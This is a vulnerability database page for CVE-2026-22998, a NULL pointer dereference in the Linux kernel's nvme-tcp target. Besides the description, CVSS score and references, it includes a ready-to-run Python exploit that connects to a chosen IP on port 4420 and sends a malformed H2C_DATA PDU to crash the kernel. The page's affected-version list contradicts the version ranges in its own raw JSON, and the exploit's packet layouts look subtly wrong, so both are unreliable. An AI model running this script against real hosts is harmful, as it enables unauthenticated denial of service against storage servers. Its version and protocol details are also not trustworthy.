CVE-2026-22998

Description

In the Linux kernel, the following vulnerability has been resolved: nvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec Commit efa56305908b ("nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length") added ttag bounds checking and data_offset validation in nvmet_tcp_handle_h2c_data_pdu(), but it did not validate whether the command's data structures (cmd->req.sg and cmd->iov) have been properly initialized before processing H2C_DATA PDUs. The nvmet_tcp_build_pdu_iovec() function dereferences these pointers without NULL checks. This can be triggered by sending H2C_DATA PDU immediately after the ICREQ/ICRESP handshake, before sending a CONNECT command or NVMe write command. Attack vectors that trigger NULL pointer dereferences: 1. H2C_DATA PDU sent before CONNECT → both pointers NULL 2. H2C_DATA PDU for READ command → cmd->req.sg allocated, cmd->iov NULL 3. H2C_DATA PDU for uninitialized command slot → both pointers NULL The fix validates both cmd->req.sg and cmd->iov before calling nvmet_tcp_build_pdu_iovec(). Both checks are required because: - Uninitialized commands: both NULL - READ commands: cmd->req.sg allocated, cmd->iov NULL - WRITE commands: both allocated

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux kernel 5.10.x < 5.10.230

Linux kernel 5.15.x < 5.15.169

Linux kernel 6.1.x < 6.1.94

Linux kernel 6.6.x < 6.6.34

Linux kernel 6.8.x < 6.8.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-22998 PoC - Linux kernel nvme-tcp NULL pointer dereference
This PoC demonstrates triggering NULL pointer dereference by sending
malformed H2C_DATA PDU immediately after ICREQ/ICRESP handshake.
"""

import socket
import struct

def build_icreq_pdu():
    """Build ICREQ PDU for TCP handshake"""
    pdu = bytearray()
    # PDU header: type=0x00 (ICREQ), flags=0x00, hlen=24, pdo=0
    pdu.extend([0x00, 0x00, 24, 0x00])
    # PDU specific: IV=16 bytes
    pdu.extend(b'\x00' * 16)
    return pdu

def build_h2c_data_pdu_with_invalid_tag():
    """Build malformed H2C_DATA PDU to trigger NULL pointer dereference
    
    Send H2C_DATA PDU immediately without sending CONNECT command.
    This causes cmd->req.sg and cmd->iov to be NULL when
    nvmet_tcp_build_pdu_iovec() tries to dereference them.
    """
    pdu = bytearray()
    # PDU header: type=0x05 (H2C_DATA), flags=0x00, hlen=48, pdo=0
    pdu.extend([0x05, 0x00, 48, 0x00])
    # Command ID
    pdu.extend(b'\x01')
    # Subtype (DataOffset and DataLen)
    pdu.extend(struct.pack('<Q', 0))  # data_offset
    pdu.extend(struct.pack('<I', 4096))  # data_len
    # Transfer tag (invalid tag to trigger bounds check path)
    pdu.extend(struct.pack('<I', 0xFFFFFFFF))
    # Status (should be 0)
    pdu.extend(struct.pack('<H', 0))
    return pdu

def trigger_vulnerability(target_ip, target_port=4420):
    """Connect to NVMe-TCP target and trigger vulnerability"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target_ip, target_port))
        print("[*] Connected to target")
        
        # Step 1: Send ICREQ to initiate handshake
        print("[*] Sending ICREQ PDU...")
        sock.sendall(build_icreq_pdu())
        
        # Step 2: Receive and ignore ICRESP
        print("[*] Waiting for ICRESP...")
        resp = sock.recv(1024)
        if resp and resp[0] == 0x01:
            print("[*] Received ICRESP, handshake complete")
        
        # Step 3: Send malformed H2C_DATA PDU BEFORE CONNECT
        # This triggers NULL pointer dereference in nvmet_tcp_build_pdu_iovec()
        print("[*] Sending malformed H2C_DATA PDU (before CONNECT)...")
        sock.sendall(build_h2c_data_pdu_with_invalid_tag())
        
        print("[*] PoC payload sent. Target may crash (NULL pointer dereference)")
        
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 4420
    trigger_vulnerability(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22998
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22998
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22998/
[4] VulDB https://vuldb.com/cve/CVE-2026-22998
[5] https://git.kernel.org/stable/c/32b63acd78f577b332d976aa06b56e70d054cbba
[6] https://git.kernel.org/stable/c/374b095e265fa27465f34780e0eb162ff1bef913
[7] https://git.kernel.org/stable/c/3def5243150716be86599c2a1767c29c68838b6d
[8] https://git.kernel.org/stable/c/76abc83a9d25593c2b7613c549413079c14a4686
[9] https://git.kernel.org/stable/c/7d75570002929d20e40110d6b03e46202c9d1bc7
[10] https://git.kernel.org/stable/c/baabe43a0edefac8cd7b981ff87f967f6034dafe
[11] https://git.kernel.org/stable/c/fdecd3b6aac10d5a18d0dc500fe57f8648b66cd4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22998", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:54.643", "lastModified": "2026-04-27T14:16:28.597", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec\n\nCommit efa56305908b (\"nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length\")\nadded ttag bounds checking and data_offset\nvalidation in nvmet_tcp_handle_h2c_data_pdu(), but it did not validate\nwhether the command's data structures (cmd->req.sg and cmd->iov) have\nbeen properly initialized before processing H2C_DATA PDUs.\n\nThe nvmet_tcp_build_pdu_iovec() function dereferences these pointers\nwithout NULL checks. This can be triggered by sending H2C_DATA PDU\nimmediately after the ICREQ/ICRESP handshake, before\nsending a CONNECT command or NVMe write command.\n\nAttack vectors that trigger NULL pointer dereferences:\n1. H2C_DATA PDU sent before CONNECT → both pointers NULL\n2. H2C_DATA PDU for READ command → cmd->req.sg allocated, cmd->iov NULL\n3. H2C_DATA PDU for uninitialized command slot → both pointers NULL\n\nThe fix validates both cmd->req.sg and cmd->iov before calling\nnvmet_tcp_build_pdu_iovec(). Both checks are required because:\n- Uninitialized commands: both NULL\n- READ commands: cmd->req.sg allocated, cmd->iov NULL\n- WRITE commands: both allocated"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnvme-tcp: soluciona desreferencias de puntero NULL en nvmet_tcp_build_pdu_iovec\n\nEl commit efa56305908b ('nvmet-tcp: Soluciona un pánico del kernel cuando el host envía una longitud de PDU H2C inválida') añadió la comprobación de límites de ttag y la validación de data_offset en nvmet_tcp_handle_h2c_data_pdu(), pero no validó si las estructuras de datos del comando (cmd->req.sg y cmd->iov) han sido inicializadas correctamente antes de procesar las PDUs H2C_DATA.\n\nLa función nvmet_tcp_build_pdu_iovec() desreferencia estos punteros sin comprobaciones de NULL. Esto puede ser provocado enviando una PDU H2C_DATA inmediatamente después del handshake ICREQ/ICRESP, antes de enviar un comando CONNECT o un comando de escritura NVMe.\n\nVectores de ataque que provocan desreferencias de puntero NULL:\n1. PDU H2C_DATA enviada antes de CONNECT ? ambos punteros NULL\n2. PDU H2C_DATA para comando READ ? cmd->req.sg asignado, cmd->iov NULL\n3. PDU H2C_DATA para slot de comando no inicializado ? ambos punteros NULL\n\nLa solución valida tanto cmd->req.sg como cmd->iov antes de llamar a nvmet_tcp_build_pdu_iovec(). Ambas comprobaciones son necesarias porque:\n- Comandos no inicializados: ambos NULL\n- Comandos READ: cmd->req.sg asignado, cmd->iov NULL\n- Comandos WRITE: ambos asignados"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.268", "versionEndExcluding": "5.5", "matchCriteriaId": "2E4BEAC0-E873-440D-A75E-55699C2412A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.209", "versionEndExcluding": "5.10.249", "matchCriteriaId": "B6983E9C-F8A9-4494-8156-3E2F7E736BF8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.148", "versionEndExcluding": "5.15.199", "matchCriteriaId": "B0275B58-DF8C-46AE-B9A5-20396D123D12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.75", "versionEndExcluding": "6.1.162", "matchCriteriaId": "9DE91ACC-6DAF-42AE-8D41-3A91572E9052"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*: ... (truncated)